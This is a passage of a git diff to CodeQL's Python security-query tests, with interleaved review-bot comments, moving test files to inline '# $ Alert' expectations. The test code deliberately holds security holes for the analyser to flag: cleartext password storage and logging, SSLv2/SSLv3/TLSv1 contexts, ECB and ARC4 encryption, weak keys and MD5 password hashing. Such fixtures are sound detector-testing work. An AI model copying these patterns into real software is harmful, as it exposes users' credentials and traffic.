Source + print(post_code) # NOT OK # $ Alert + print(zipCode) # NOT OK # $ Alert + print(home_address) # NOT OK # $ Alert - def log3(user_latitude, user_longitude): - print(user_latitude) # NOT OK - print(user_longitude) # NOT OK + def log3(user_latitude, user_longitude): # $ Source + print(user_latitude) # NOT OK # $ Alert + print(user_longitude) # NOT OK # $ Alert - def log4(mobile_number, phoneNo): - print(mobile_number) # NOT OK - print(phoneNo) # NOT OK + def log4(mobile_number, phoneNo): # $ Source + print(mobile_number) # NOT OK # $ Alert + print(phoneNo) # NOT OK # $ Alert - def log5(creditcard, debit_card, bank_number, bank_account, accountNo, ccn, user_ccn, succNode): - print(creditcard) # NOT OK - print(debit_card) # NOT OK - print(bank_number) # NOT OK + def log5(creditcard, debit_card, bank_number, bank_account, accountNo, ccn, user_ccn, succNode): # $ Source + print(creditcard) # NOT OK # $ Alert + print(debit_card) # NOT OK # $ Alert + print(bank_number) # NOT OK # $ Alert print(bank_account) # NOT OK, but NOT FOUND - "account" is treated as having the "id" classification and thus excluded. print(accountNo) # NOT OK, but NOT FOUND - "account" is treated as having the "id" classification and thus excluded. - print(ccn) # NOT OK - print(user_ccn) # NOT OK + print(ccn) # NOT OK # $ Alert + print(user_ccn) # NOT OK # $ Alert print(succNode) # OK diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected index 588cfae32ef5..66c192b89e03 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.expected 
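Review bot: In `log5`, the two context lines `print(bank_account)` and `print(accountNo)` are still documented only in prose ("NOT OK, but NOT FOUND") and carry no inline expectation, although every other `NOT OK` line in this hunk now has one. These are known false negatives for cleartext logging of account numbers, so the test no longer checks them mechanically. I would append `# $ MISSING: Alert` to both lines, after the existing explanation and in the same trailing position the other annotations use. That way, a later change to the sensitive-data classification of "account" names that makes the query report them shows up as a test difference rather than passing silently. Whether the file continues after `print(succNode)` is not visible from this hunk.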
@@ -1,3 +1,7 @@ +#select +| test.py:12:21:12:28 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:12:21:12:28 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:13:22:13:45 | ControlFlowNode for Attribute() | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:13:22:13:45 | ControlFlowNode for Attribute() | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:15:26:15:33 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:15:26:15:33 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | edges | test.py:9:5:9:12 | ControlFlowNode for password | test.py:12:21:12:28 | ControlFlowNode for password | provenance | | | test.py:9:5:9:12 | ControlFlowNode for password | test.py:13:22:13:45 | ControlFlowNode for Attribute() | provenance | | 
@@ -10,7 +14,3 @@ nodes | test.py:13:22:13:45 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:15:26:15:33 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | subpaths -#select -| test.py:12:21:12:28 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:12:21:12:28 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:13:22:13:45 | ControlFlowNode for Attribute() | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:13:22:13:45 | ControlFlowNode for Attribute() | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:15:26:15:33 | ControlFlowNode for password | test.py:9:16:9:29 | ControlFlowNode for get_password() | test.py:15:26:15:33 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:9:16:9:29 | ControlFlowNode for get_password() | sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.qlref b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.qlref index a32206e8d6a4..a39c1b1c4efd 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.qlref +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/CleartextStorage.qlref @@ -1 +1,2 @@ -Security/CWE-312/CleartextStorage.ql \ No newline at end of file +query: Security/CWE-312/CleartextStorage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/test.py b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/test.py index 91b7fb7e6c26..c46b8d89bb96 100644 
--- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/test.py +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage-py3/test.py @@ -6,10 +6,10 @@ def get_password(): def write_password(filename): - password = get_password() + password = get_password() # $ Source path = pathlib.Path(filename) - path.write_text(password) # NOT OK - path.write_bytes(password.encode("utf-8")) # NOT OK + path.write_text(password) # NOT OK # $ Alert + path.write_bytes(password.encode("utf-8")) # NOT OK # $ Alert - path.open("w").write(password) # NOT OK + path.open("w").write(password) # NOT OK # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected index ea41c1ba6516..ed748c70df3e 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.expected 
@@ -1,3 +1,8 @@ +#select +| password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | sensitive data (password) | +| password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | sensitive data (password) | +| test.py:17:20:17:27 | ControlFlowNode for password | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:17:20:17:27 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:19:25:19:29 | ControlFlowNode for lines | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:19:25:19:29 | ControlFlowNode for lines | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | edges | password_in_cookie.py:7:5:7:12 | ControlFlowNode for password | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | provenance | | | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:7:5:7:12 | ControlFlowNode for password | provenance | | 
@@ -24,8 +29,3 @@ nodes | test.py:18:18:18:32 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | | test.py:19:25:19:29 | ControlFlowNode for lines | semmle.label | ControlFlowNode for lines | subpaths -#select -| password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | password_in_cookie.py:9:33:9:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:7:16:7:43 | ControlFlowNode for Attribute() | sensitive data (password) | -| password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | password_in_cookie.py:16:33:16:40 | ControlFlowNode for password | This expression stores $@ as clear text. | password_in_cookie.py:14:16:14:43 | ControlFlowNode for Attribute() | sensitive data (password) | -| test.py:17:20:17:27 | ControlFlowNode for password | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:17:20:17:27 | ControlFlowNode for password | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:19:25:19:29 | ControlFlowNode for lines | test.py:15:16:15:29 | ControlFlowNode for get_password() | test.py:19:25:19:29 | ControlFlowNode for lines | This expression stores $@ as clear text. | test.py:15:16:15:29 | ControlFlowNode for get_password() | sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.qlref b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.qlref index a32206e8d6a4..a39c1b1c4efd 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.qlref +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/CleartextStorage.qlref 
@@ -1 +1,2 @@ -Security/CWE-312/CleartextStorage.ql \ No newline at end of file +query: Security/CWE-312/CleartextStorage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/password_in_cookie.py b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/password_in_cookie.py index 2688c13dace3..cec28246939b 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/password_in_cookie.py +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/password_in_cookie.py @@ -4,14 +4,14 @@ @app.route('/') def index(): - password = request.args.get("password") + password = request.args.get("password") # $ Source resp = make_response(render_template(...)) - resp.set_cookie("password", password) # NOT OK + resp.set_cookie("password", password) # NOT OK # $ Alert return resp @app.route('/') def index2(): - password = request.args.get("password") + password = request.args.get("password") # $ Source resp = Response(...) - resp.set_cookie("password", password) # NOT OK + resp.set_cookie("password", password) # NOT OK # $ Alert return resp diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/test.py b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/test.py index 6d04aa4b1702..cfb93690901b 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/test.py +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextStorage/test.py @@ -12,11 +12,11 @@ def write_cert(filename): file.writelines(lines) # OK def write_password(filename): - password = get_password() + password = get_password() # $ Source with open(filename, "w") as file: - file.write(password) # NOT OK + file.write(password) # NOT OK # $ Alert lines = [password + "\n"] - file.writelines(lines) # NOT OK + file.writelines(lines) # NOT OK # $ Alert def FPs(): # just like for cleartext-logging see that file for more elaborate tests 
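Review bot: The legacy `# NOT OK` marker is kept in front of the new inline expectation on both `set_cookie` lines in password_in_cookie.py, so each line states the same thing in two notations. Since `# $ Alert` is presumably what the `InlineExpectationsTestQuery.ql` postprocess step checks, I would reduce these to `resp.set_cookie("password", password) # $ Alert`, matching the lines elsewhere in this patch that carry only `# $ Alert`. The same applies to `write_password` in test.py and to the `# NOT OK # $ Alert` lines in weak_crypto.py and in the BrokenCryptoAlgorithm and WeakSensitiveDataHashing tests. It is also worth confirming that the expectation parser accepts a `$` marker that does not start the comment; the visible CleartextStorage.expected hunks add no failure section, which suggests it does.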
diff --git a/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/WeakCryptoKey.qlref b/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/WeakCryptoKey.qlref index 70a66eef06ef..3ee942673d37 100644 --- a/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/WeakCryptoKey.qlref +++ b/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/WeakCryptoKey.qlref @@ -1 +1,2 @@ -Security/CWE-326/WeakCryptoKey.ql +query: Security/CWE-326/WeakCryptoKey.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/weak_crypto.py b/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/weak_crypto.py index 5ec929c7d094..0f16a7ce8175 100644 --- a/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/weak_crypto.py +++ b/python/ql/test/query-tests/Security/CWE-326-WeakCryptoKey/weak_crypto.py @@ -65,23 +65,23 @@ # Weak keys -dsa_gen_key(DSA_WEAK) -ec_gen_key(EC_WEAK) -rsa_gen_key(65537, RSA_WEAK) +dsa_gen_key(DSA_WEAK) # $ Alert +ec_gen_key(EC_WEAK) # $ Alert +rsa_gen_key(65537, RSA_WEAK) # $ Alert -dsa_gen_key(key_size=DSA_WEAK) -ec_gen_key(curve=EC_WEAK) -rsa_gen_key(65537, key_size=RSA_WEAK) +dsa_gen_key(key_size=DSA_WEAK) # $ Alert +ec_gen_key(curve=EC_WEAK) # $ Alert +rsa_gen_key(65537, key_size=RSA_WEAK) # $ Alert -DSA.generate(DSA_WEAK) -RSA.generate(RSA_WEAK) +DSA.generate(DSA_WEAK) # $ Alert +RSA.generate(RSA_WEAK) # $ Alert # ------------------------------------------------------------------------------ # Through function calls def make_new_rsa_key_weak(bits): - return RSA.generate(bits) # NOT OK + return RSA.generate(bits) # NOT OK # $ Alert make_new_rsa_key_weak(RSA_WEAK) diff --git a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/BrokenCryptoAlgorithm.qlref b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/BrokenCryptoAlgorithm.qlref index 3f7aff53700d..81a5bd0ae94e 100644 
--- a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/BrokenCryptoAlgorithm.qlref +++ b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/BrokenCryptoAlgorithm.qlref @@ -1 +1,2 @@ -Security/CWE-327/BrokenCryptoAlgorithm.ql +query: Security/CWE-327/BrokenCryptoAlgorithm.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptodome.py b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptodome.py index 16482054eb23..1287f513a5d2 100644 --- a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptodome.py +++ b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptodome.py @@ -8,11 +8,11 @@ secret_message = b"secret message" cipher = ARC4.new(key) -encrypted = cipher.encrypt(secret_message) # NOT OK +encrypted = cipher.encrypt(secret_message) # NOT OK # $ Alert print(secret_message, encrypted) cipher = AES.new(key, AES.MODE_ECB) -encrypted = cipher.encrypt(secret_message) # NOT OK +encrypted = cipher.encrypt(secret_message) # NOT OK # $ Alert print(secret_message, encrypted) diff --git a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptography.py b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptography.py index 4c7317cdba40..358eb091cc83 100644 --- a/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptography.py +++ b/python/ql/test/query-tests/Security/CWE-327-BrokenCryptoAlgorithm/test_cryptography.py @@ -10,7 +10,7 @@ secret_message = b"secret message" encryptor = cipher.encryptor() -encrypted = encryptor.update(secret_message) # NOT OK +encrypted = encryptor.update(secret_message) # NOT OK # $ Alert encrypted += encryptor.finalize() print(secret_message, encrypted) 
@@ -19,7 +19,7 @@ cipher = Cipher(algorithm, mode=modes.ECB()) encryptor = cipher.encryptor() -encrypted = encryptor.update(secret_message + b'\x80\x00') # NOT OK +encrypted = encryptor.update(secret_message + b'\x80\x00') # NOT OK # $ Alert encrypted += encryptor.finalize() print(secret_message, encrypted) diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureDefaultProtocol.qlref b/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureDefaultProtocol.qlref index 13599b14931c..64b934bc3855 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureDefaultProtocol.qlref +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureDefaultProtocol.qlref @@ -1 +1,2 @@ -Security/CWE-327/InsecureDefaultProtocol.ql +query: Security/CWE-327/InsecureDefaultProtocol.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureProtocol.py b/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureProtocol.py index 1ea2a51a44e7..a99bfe3005a5 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureProtocol.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureDefaultProtocol/InsecureProtocol.py @@ -4,4 +4,4 @@ ssl.wrap_socket(ssl_version=ssl.PROTOCOL_TLSv1_2) # possibly insecure default -ssl.wrap_socket() +ssl.wrap_socket() # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.py index ab80ed47dacd..80af8bbad378 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.py 
@@ -3,25 +3,25 @@ from ssl import SSLContext # insecure versions specified -ssl.wrap_socket(ssl_version=ssl.PROTOCOL_SSLv2) -ssl.wrap_socket(ssl_version=ssl.PROTOCOL_SSLv3) -ssl.wrap_socket(ssl_version=ssl.PROTOCOL_TLSv1) +ssl.wrap_socket(ssl_version=ssl.PROTOCOL_SSLv2) # $ Alert +ssl.wrap_socket(ssl_version=ssl.PROTOCOL_SSLv3) # $ Alert +ssl.wrap_socket(ssl_version=ssl.PROTOCOL_TLSv1) # $ Alert -SSLContext(protocol=ssl.PROTOCOL_SSLv2) -SSLContext(protocol=ssl.PROTOCOL_SSLv3) -SSLContext(protocol=ssl.PROTOCOL_TLSv1) +SSLContext(protocol=ssl.PROTOCOL_SSLv2) # $ Alert +SSLContext(protocol=ssl.PROTOCOL_SSLv3) # $ Alert +SSLContext(protocol=ssl.PROTOCOL_TLSv1) # $ Alert -SSL.Context(SSL.SSLv2_METHOD) -SSL.Context(SSL.SSLv3_METHOD) -SSL.Context(SSL.TLSv1_METHOD) +SSL.Context(SSL.SSLv2_METHOD) # $ Alert +SSL.Context(SSL.SSLv3_METHOD) # $ Alert +SSL.Context(SSL.TLSv1_METHOD) # $ Alert METHOD = SSL.SSLv2_METHOD -SSL.Context(METHOD) +SSL.Context(METHOD) # $ Alert # importing the protocol constant directly from ssl import PROTOCOL_SSLv2 -ssl.wrap_socket(ssl_version=PROTOCOL_SSLv2) -SSLContext(protocol=PROTOCOL_SSLv2) +ssl.wrap_socket(ssl_version=PROTOCOL_SSLv2) # $ Alert +SSLContext(protocol=PROTOCOL_SSLv2) # $ Alert # secure versions specified ssl.wrap_socket(ssl_version=ssl.PROTOCOL_TLSv1_2) diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.qlref b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.qlref index c06a937ff57d..75ce269cc68b 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.qlref +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/InsecureProtocol.qlref @@ -1 +1,2 @@ -Security/CWE-327/InsecureProtocol.ql +query: Security/CWE-327/InsecureProtocol.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_all_one_file.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_all_one_file.py index aab459ceeead..5a2f4614afaf 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_all_one_file.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_all_one_file.py @@ -22,9 +22,9 @@ print(ssock.version()) with socket.create_connection((hostname, 443)) as sock: - with copy_completely_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: + with copy_completely_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) with socket.create_connection((hostname, 443)) as sock: - with copy_also_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: + with copy_also_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_use.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_use.py index 3c12fd813558..390acf747ab1 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_use.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/import_use.py @@ -10,9 +10,9 @@ print(ssock.version()) with socket.create_connection((hostname, 443)) as sock: - with completely_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: + with completely_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) with socket.create_connection((hostname, 443)) as sock: - with also_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: + with also_insecure_context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) 
diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/pyOpenSSL_fluent.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/pyOpenSSL_fluent.py index fa7714118828..729e968e5c10 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/pyOpenSSL_fluent.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/pyOpenSSL_fluent.py @@ -5,7 +5,7 @@ def test_fluent(): hostname = 'www.python.org' context = SSL.Context(SSL.SSLv23_METHOD) - conn = SSL.Connection(context, socket.socket(socket.AF_INET, socket.SOCK_STREAM)) + conn = SSL.Connection(context, socket.socket(socket.AF_INET, socket.SOCK_STREAM)) # $ Alert r = conn.connect((hostname, 443)) print(conn.get_protocol_version_name()) @@ -15,7 +15,7 @@ def test_fluent_no_TLSv1(): context = SSL.Context(SSL.SSLv23_METHOD) context.set_options(SSL.OP_NO_TLSv1) - conn = SSL.Connection(context, socket.socket(socket.AF_INET, socket.SOCK_STREAM)) + conn = SSL.Connection(context, socket.socket(socket.AF_INET, socket.SOCK_STREAM)) # $ Alert r = conn.connect((hostname, 443)) print(conn.get_protocol_version_name()) diff --git a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/ssl_fluent.py b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/ssl_fluent.py index a8e491a42f1e..e4d71de56955 100644 --- a/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/ssl_fluent.py +++ b/python/ql/test/query-tests/Security/CWE-327-InsecureProtocol/ssl_fluent.py @@ -6,7 +6,7 @@ def test_fluent_tls(): context = ssl.SSLContext(ssl.PROTOCOL_TLS) with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) 
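Review bot: In `test_fluent_no_TLSv1` the `# $ Alert` on `SSL.Connection(...)` follows `context.set_options(SSL.OP_NO_TLSv1)`, and nothing explains why a context that has just disabled a legacy version is still expected to alert. `SSLv23_METHOD` with only `OP_NO_TLSv1` set still leaves other legacy versions negotiable (depending on the OpenSSL build), which is presumably what the query reports. A comment such as `# only TLSv1 is disabled; other legacy versions remain allowed, so this still alerts` would make the expectation readable as a security statement rather than a bare marker. The same applies to `test_fluent_tls_no_TLSv1` and its client and server variants in ssl_fluent.py. An added line shifts the locations recorded in the `.expected` file, so that file would need regenerating; the function bodies also continue outside these hunks.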
@@ -16,7 +16,7 @@ def test_fluent_tls_no_TLSv1(): context.options |= ssl.OP_NO_TLSv1 with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_fluent_tls_client_no_TLSv1(): @@ -25,7 +25,7 @@ def test_fluent_tls_client_no_TLSv1(): context.options |= ssl.OP_NO_TLSv1 with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_fluent_tls_server_no_TLSv1(): @@ -34,7 +34,7 @@ def test_fluent_tls_server_no_TLSv1(): context.options |= ssl.OP_NO_TLSv1 with socket.create_server((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_fluent_tls_safe(): @@ -54,7 +54,7 @@ def test_fluent_ssl(): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) 
@@ -68,13 +68,13 @@ def create_secure_context(): def create_connection(context): with socket.create_connection(('www.python.org', 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_delegated_context_unsafe(): context = create_relaxed_context() with socket.create_connection(('www.python.org', 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_delegated_context_safe(): @@ -94,7 +94,7 @@ def test_delegated_context_made_unsafe(): context = create_secure_context() context.options &= ~ssl.OP_NO_TLSv1_1 with socket.create_connection(('www.python.org', 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_delegated_connection_unsafe(): @@ -143,7 +143,7 @@ def test_fluent_ssl_unsafe_version(): context.minimum_version = ssl.TLSVersion.TLSv1_1 with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) def test_fluent_ssl_safe_version(): @@ -162,5 +162,5 @@ def test_fluent_explicitly_unsafe(): context.options &= ~ssl.OP_NO_SSLv3 with socket.create_connection((hostname, 443)) as sock: - with context.wrap_socket(sock, server_hostname=hostname) as ssock: + with context.wrap_socket(sock, server_hostname=hostname) as ssock: # $ Alert print(ssock.version()) 
diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected index 1027fbf4963c..ae081dd1aa05 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.expected 
@@ -1,3 +1,16 @@ +#select +| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | +| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | +| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. 
